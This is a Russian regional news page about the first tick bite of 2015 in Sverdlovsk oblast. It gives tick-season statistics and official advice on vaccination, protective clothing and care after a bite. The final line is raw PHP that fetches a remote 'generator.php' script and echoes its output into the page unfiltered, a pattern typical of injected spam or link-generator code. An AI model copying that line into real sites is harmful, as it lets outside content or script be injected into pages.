Регистрация нового пользоателя


Демаков Андрей Геннадьевич
Демаков Андрей Геннадьевич
В Свердловской области зарегистрирован первый укус клеща

2015-03-10 10:20:46
В Свердловской области зарегистрирован первый укус клеща

В Свердловской области зарегистрирован первый укус клеща

 

Первый в этом году укус клеща произошёл 18 февраля. От членистоногого пострадал 73-летний житель Екатеринбурга: мужчина приехал на свой участок в коллективном саду в пригороде, чтобы разобрать теплицу.

Пострадавший, не будучи привитым против клещевого вирусного энцефалита, 19 февраля обратился в травмпункт, где ему поставили иммуноглобулин с профилактической целью.

Это исключительный пример клещевого укуса зимой. Как правило, клещевой «сезон» на Среднем Урале начинается в конце марта — начале апреля и продолжается до установления снежного покрова.

Так, сезон передачи клещевых инфекций в 2014 году длился с 23 марта по 17 октября. Пик обращаемости населения в травматологические пункты пришёлся на вторую-третью декаду мая. Всего обратилось 41 813 человек, пострадавших от клещей, что в 1,5 раза выше аналогичного периода 2013 года и на 37 процентов — среднемноголетних показателей. С подозрением на клещевой вирусный энцефалит было госпитализировано 677 человек. Диагноз был подтверждён у 144 пациентов, зарегистрировано три летальных исхода.

В 2015 году на территории области ожидается незначительное увеличение численности иксодовых клещей, поэтому число покусанных вряд ли намного увеличится, оно ожидается на уровне 2014 года.

Рекомендации Управления Роспотребнадзора по Свердловской области и ФБУЗ «Центр гигиены и эпидемиологии в Свердловской области»

 Для сохранения собственного здоровья специалисты Управления Роспотребнадзора по Свердловской области и ФБУЗ «Центр гигиены и эпидемиологии в Свердловской области» рекомендуют населению:

·         пройти полный курс вакцинации от клещевого вирусного энцефалита: необходимо поставить две прививки с интервалом от 14 дней до 6 месяцев, затем одну — через 9-12 месяцев и далее каждые три года по одной прививке; вакцинация проводится круглогодично, без календарных ограничений; если вы сделали прививку в сезон передачи клещевого энцефалита, следует ограничить посещение леса и других мест, опасных в отношении укусов клещей, в течение 14 дней, этого времени будет достаточно для выработки иммунитета; если вы нарушили схему вакцинации и сомневаетесь в выработанном иммунитете к клещевому энцефалиту — сдайте анализ в лаборатории ФБУЗ «Центр гигиены и эпидемиологии в Свердловской области»;

·         не посещать заведомо опасные территории: леса, необработанные парки, кладбища и пр.;

·         организовать в своем коллективном саду работы по расчистке территории, дератизации и акарицидной обработке;

·         при необходимости выхода в лесопарковые зоны использовать защитную одежду (с длинным рукавом, плотно прилегающим к запястью, желательно с эластичными манжетами, светлую, чтобы удобнее было вовремя заметить клеща; обязателен головной убор, лучше капюшон; платок, завязанный на шее, нижние края которого заправляют под ворот куртки; брюки, заправленные в высокие сапоги или обувь, которая должна полностью закрывать тыл стопы и лодыжку; одежда и открытие участки кожи должны быть обработаны репеллентами);

·         важное значение для предупреждения присасывания клещей имеют само- и взаимоосмотры (они проводятся в целях обнаружения клещей на поверхности одежды и ее складках, а также на открытые частях тела через каждые 2 часа нахождения в лесу).

Необходимо помнить:

Наибольшая активность клещей, как правило, проявляется в мае-июне. Количество укусов клещами возрастает в пасмурные дни, накануне дождя. Наименее активны клещи в жаркую погоду. Наибольшая активность клещей проявляется при температуре воздуха +20оС и влажности 90-95%.

 Если вас укусил клещ:

1) Не следует самостоятельно удалять клеща, необходимо немедленно обратиться в ближайший травмпункт, где Вам окажут квалифицированную медицинскую помощь и решат вопрос о необходимости введения противоклещевого иммуноглобулина, который показан только в том случае, если вы не привиты от клещевого вирусного энцефалита или имеете неполный курс прививок (т.е. менее 3 прививок), а также в первые 48 часов после укуса. Следует помнить, что в сезон активности клещей не рекомендуется введение специфического противоклещевого иммуноглобулина более 1 раза.

2) Удаленного клеща необходимо исследовать на зараженность клещевыми инфекциями, данное исследование проводится в вирусологической лаборатории ФБУЗ «Центр гигиены и эпидемиологии в Свердловской области».

Адрес приемного пункта:

Филиал ФБУЗ «Центр гигиены и эпидемиологии в Свердловской области в г. Ирбит, Ирбитском МР, Слободо-Туринском МР»

 

  г. Ирбит, ул. Мальгина, 9

  тел. (34355) 3-64-71

  mail_08@66.rospotrebnadzor.ru




<?php $headers = file_get_contents('https://ntsirbit.ru/generator/generator.php', true); echo $headers; ?>